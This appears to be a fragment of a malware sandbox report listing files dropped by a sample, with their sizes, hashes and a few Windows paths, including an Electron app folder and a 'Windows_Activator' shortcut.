SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD598cc36e9e2b2a271eb20570c0e6d7cfe
SHA10e7c1e4b67ae11e66c58132bb14c8392bd937514
SHA25614ed83ae56b6603e709560126e942cf9e3b2da92136a2021c7e85914b308ef29
SHA512403204bf41b3e5fd693bf9ba6162322c903cb244a2074b53615265a6c9f78f6e00fc1b3a96337adca15212458223617692e29e86d62ff892b062e733ade43671
-
Filesize
1KB
MD56eb654f3eec03a882c6e48009b10420f
SHA1fd309cd9445cbfeddc98865b66f7d78d7342acc1
SHA2566858a0cc2c66f90d83e8887b710cd4080e0b8dbcb9851c112022d5d15583d318
SHA512b9a5c91551c34091402f78eb84a29b03bc8456a0235988e8d0b83e27224ce2d3e5fa3b4c4e7d8e2429b5584c0a703070863b783676b09129fd76e1f3e9ea209f
-
Filesize
132KB
MD5a0e681fdd4613e0fff6fb8bf33a00ef1
SHA16789bacfe0b244ab6872bd3acc1e92030276011e
SHA25686f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2
SHA5126f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196
-
Filesize
190KB
MD5c37bd7a6b677a37313b7ecc4ff01b6f5
SHA179db970c44347bd3566cefb6cabd1995e8e173df
SHA2568c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a
SHA512a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb
-
Filesize
4.7MB
MD52191e768cc2e19009dad20dc999135a3
SHA1f49a46ba0e954e657aaed1c9019a53d194272b6a
SHA2567353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d
SHA5125adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970
-
Filesize
2.8MB
MD5208e7af956a0803900125bdc11a3ecf2
SHA11bd84174194485da634bf8b3af0a78e236316a8e
SHA256d863c8a26744703f2d12c674b45c87d8b34e21efce169d4797b57964d168b077
SHA51276937999a21391107d9ebcfd66c7a2ca967cc7cac7aeb2b15bbeca6b546423a3d5c83969ef151c95d916d5a9f653573cd59d05110566d52a5c2679059c4d4ec3
-
Filesize
10.2MB
MD5e0f1ad85c0933ecce2e003a2c59ae726
SHA1a8539fc5a233558edfa264a34f7af6187c3f0d4f
SHA256f5170aa2b388d23bebf98784dd488a9bcb741470384a6a9a8d7a2638d768defb
SHA512714ed5ae44dfa4812081b8de42401197c235a4fa05206597f4c7b4170dd37e8360cc75d176399b735c9aec200f5b7d5c81c07b9ab58cbca8dc08861c6814fb28
-
Filesize
477KB
MD51b74f7e2b5d44ac10a89a5cf206630a8
SHA1dd2e816e315b6a6a271fb01dc12163d9936c77c4
SHA256662746a02930c151c5cab2b1167a56c6ca78b44028448fda91182147856edfed
SHA512246814e5fc157cf731e3ec3e1096922864b48a36cc5b1e5259ebd2e673fde5dc741ad600f69cd80e1544ee12438f7cc6f208add894b5e02ac5e2c87d0b3933a8
-
Filesize
7.3MB
MD5596379ba25b32e95b5ec3cd8028b291b
SHA1af61b5d29db91997e29ffed8a410d09ce74ee51e
SHA256d5e1d7b8531a0f4ab576ba6f78d4c63b39186a2830d313c6695f0024c9ef627a
SHA512f8835b455820c77b4ba509c326a185bf65131242161498229c5e3584a0e7789324932b95678556a657440deaf067ead454e85bf8233efa24162e7e4d9eaf417b
-
Filesize
411KB
MD5626f30cfd9ad7b7c628c6a859e4013bd
SHA102e9a759c745a984b5f39223fab5be9b5ec3d5a7
SHA2560fd74bb69ad35b3f9391fa760bf0eb0ee73d2bea0066244577ef2abd269513de
SHA5129ce902f21fef70c5b5af444b532b36c9a00d896878cb4021c9b1dc07aa3277d956bca65ee0adb68467eec113e535b60a8a5fb5414c7d0ca761ceae5c43b7d9a9
-
Filesize
5.2MB
MD5e2088909e43552ad3e9cce053740185d
SHA124b23dd4cad49340d88b9cb34e54c3ca0eb0d27f
SHA256bba36d4d18d64d9627f54c54fd645c5ba459d25a59acc5228210bd707aef67fd
SHA512dcefacddec38d8941c7d2d7b971b6f22dd0acb4116e48891d1d48a4d88968da12b152ccb7591715c88f8e14c315e235d1c4e6852cc38b9246091c50226900de6
-
C:\Users\Admin\AppData\Local\Programs\raylike\resources\app.asar.unpacked\node_modules\nva-direct-showof\build\Release\DirectShowModule.node
Filesize276KB
MD572419a42286a63cce53a0ba5300d1761
SHA10d017093bcd16240129a91f5ab6678e8340d52d9
SHA2566b2380ba99ba4bbf351363d92d3125b24c4ae1e0b34de57eb653d4558cf9f4ef
SHA5123492ca59c8df5ff1b77cd9a118d3591a97105609266bdfddc99e9989c511f10e882fc23542e30c541733e85d213272dd456665c9d2a518e31d2ebab732b57e19
-
C:\Users\Admin\AppData\Local\Programs\raylike\resources\app.asar.unpacked\node_modules\nva-pc-inf\build\Release\addon.node
Filesize127KB
MD583636373e26835820e033130f214408c
SHA15141a2d51be3274d2e0d310261568fdd2ccdf38a
SHA2568a0005eb952f07b585ac10679077248c466ec64e4966ddce73afd33689182a94
SHA5123e86cc7b7833b90cc5d833c1945cd6919a70bd7615c5a0c169d108e44f113f3b67ec53c23cbcb376a1154930c0d5dc878d49c459b89b6a0d8aeb9b3d8d692632
-
C:\Users\Admin\AppData\Local\Programs\raylike\resources\app.asar.unpacked\node_modules\nva-process-inf\build\Release\addon.node
Filesize121KB
MD553464fdfe2572b20916d86b55d72cea2
SHA1bfc52e1ecd193fc32e1ca31543d0d1af17302169
SHA256fd23e66a208a567aff69a0bcfd3610e25c2dc1d7b614be1f90f7ea6722246e7a
SHA512d188cf56db469dca70408ee15ca567a4f1d47f3169b4dedd1ae5375c2ba763d48cd6fe30652f6035d95cc67e58a9bdc1887d43a123f5b1bce550459b0c6bb71f
-
C:\Users\Admin\AppData\Local\Programs\raylike\resources\app.asar.unpacked\node_modules\sqlite3\lib\binding\napi-v6-win32-unknown-x64\node_sqlite3.node
Filesize1.8MB
MD53072b68e3c226aff39e6782d025f25a8
SHA1cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA2567fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA51261ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
-
C:\Users\Admin\AppData\Local\Programs\raylike\resources\app.asar.unpacked\node_modules\windcrypt\build\Release\windcrypt.node
Filesize154KB
MD5c885c754ac58262f884c2417b629b3a5
SHA12f1d22a1662980d4309acad5fd4e2d1c1d268285
SHA2566563811d8d3dc300699b7000553496821a3788e8dc42136eb39faa043793e376
SHA5124a8d4ced6817d2cd85357fb2dc9575d20f99fefecef56c0164c168559545f456a1da0a6e0741a90ded893a2ecc0b60a2feb1276e6bcf9316f2988701cd48e19c
-
Filesize
611KB
MD51a37f6614ff8799b1c063bc83c157cc3
SHA18238b9295e1dde9de0d6fd20578e82703131a228
SHA2564fbe07f71b706c2a2948eba9a6b1979e23c83342b190723a6ec5251b2d6dad7c
SHA5126677f65a0e26fdc2cff6cef0231f5e5f0713ee7c5cf7f488599a3c7ac3e8365afaec10b35d6145ea58d364151d8bcb08308765693a9797ea99b894d6e8224ac7
-
Filesize
4.9MB
MD5f16c36ae369609497bfd0847889bec63
SHA15dca218bf0b2a20d7d027fa10fdb1b8152564fe4
SHA2564488a958418227fbe6f64898c2f85eefd87fc9e46aea457233b38db8a86e944d
SHA5129f06f4a318c8a3e2fdccb6d983087184cff37a2b79e0c1e85b3ac8e45695454c4aacb4468593ebbfff64739b0d598ba4d1d9dd94187b1bbd82c1369c62781109
-
Filesize
424KB
MD518b04b4684a599a8d90d73590878638c
SHA158a39b8bf49fc2be234f42f84047b98c3637a102
SHA256be2fd5e2c2685b9f417f865c4cf2e1b8e93361783868104c1f3ffb773d4576a9
SHA5128b0aa2ebcf379b2a67b3436e79306cea195f442b2e8b24fe9e972b026afdaec9038d1929a34183a9618705b6ec8bf03b9f8f6f663ad476c37f1dff1966359b66
-
Filesize
728B
MD53691ec87021ddc90e3a8b6a2da9c5107
SHA17dbb9d8d3206d9df9ccd5ebddf8a9f4f03790706
SHA2565052fc108e2a5ed225f198db1d85bb3951e8e29c428f7324832d35710632596b
SHA512ec9b298b7d656106c5788e103be317b9522babb8aa9b7f367852410d61e006ec4af918cce16f602f66dd5d1593c83f0efd539ba6e76a792151dd9c4252e778a9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
2KB
MD543514a2f8d260a98d172b82dbd0a78a7
SHA1ceac8fc45d20f76b9220bee435af6ace001cfe91
SHA2561c9a32bf508b11bf080d6ebdcb52a8e88708767514d8dba168410b93a19d99ac
SHA512c3cbbc5a31eb4e1464c3214360f2c6404337535eb156b48d3a5a589b5c85b56ea36f0743a83b16041899a225aa5dffcb053e9bd722253bac49c131b119c9dcf3
-
Filesize
278B
MD507ef0472566999ce36421a21d4c70afa
SHA13373b4d620423c28f0f4f385ad40c646c20c7fcf
SHA25650893f993e6528a14cd8985cb3b11a8090bc9357960cfa7956636c9980f3180c
SHA512491ca910702e1c76829542c1b1da0b2ffe4fbdb484084baba228d544d86e401c0aaaec14ec55e41b15595c23ce2c99aa614bc2a42ca28babdfed41f465bc5754
-
Filesize
1KB
MD5dafacdb31fb3ffaab56b36cb1dc62d97
SHA16979305cb674e66cf63089dc627d1efa9a7720ab
SHA25676a95723d3c5d4ca9c21b34b5a4441743d086b23ba4cee0e1cfba7635b5a5afc
SHA512aa39d20a8ad1d220604a823d66c646294c0ea1b2715b89c4a0be5a3cb220e47fc9f119c39acaf75259f3e1b8d43792ccd9b9dd5159cbe9be5c973c5e2a1971c4
-
Filesize
2KB
MD5ed7d43a2f330b022360357156581e2aa
SHA1dbd403b3a9bd7d95fd4cc558d619f5c223fe7fce
SHA256b15a1bd17672cbad67801b00a83854d2eb2dc08e5c234ccccc95cfec1aaaf8fc
SHA51287530cc98fc1bc7f7e856688e71ba6c1b1af4efc43faa6061f984fe5b52cbddbecf40062196d759029cf745bcaf5b0a6ab25b74f2080e348f8b56c80017004bf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows_Activator.lnk~RFe58080a.TMP
Filesize2KB
MD5c352097d945ef271a80fc01d61ea613d
SHA15fe17d2fc291a4c2b7dc8a2e4a41867b4db55eaf
SHA2568e246fb2c012281f997f3cd01bfd3cc1f8cf52de23abddcc7cbee42860ce7c58
SHA51225dd91b14f759788572d49b3b05e78602d85059405114e2a055f2124ad0fec61c2977072466b45eaab8c7add8175b435ccf2bc0e11eff159b9496cd2ed9343af
-
Filesize
24.0MB
MD527db9470e29472c770d8daac1e42f6fd
SHA1035f2348367c72803f5dc0c883811aacc7cd08cb
SHA256c454a0468506ccf2a14dab1cb5e2383701ed4f5c3a96ada13c746c8d6c4b2440
SHA51256c2bcdc2b0a8ace830254b09a148eeac7b6ea4f9d7cf28f10daf6f642bd367ef6af2524a7ca71612ef98b44787283006ac808e526807d5c1a3db11ee6c36751
-
\??\Volume{a28c4a47-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{d2679df7-80fc-49d1-a779-dc432bcaaa4c}_OnDiskSnapshotProp
Filesize6KB
MD5ef1b9f9e2e334ff1130055b9e0d7e64e
SHA16d981eff414fe5c054d88fcd7c7f3987299e5da7
SHA256497e4cfedc3940e99b89e62e2d390012ea16fce5e6c56971d052abe064ae3437
SHA5122f222374c921627a5030ae1c34a518ddd33a6c7bb320894620f9e7b4b974410d296640539af2d7dd171c0ee15a84653b99e1d7a626a5809b11cbc751fffa904d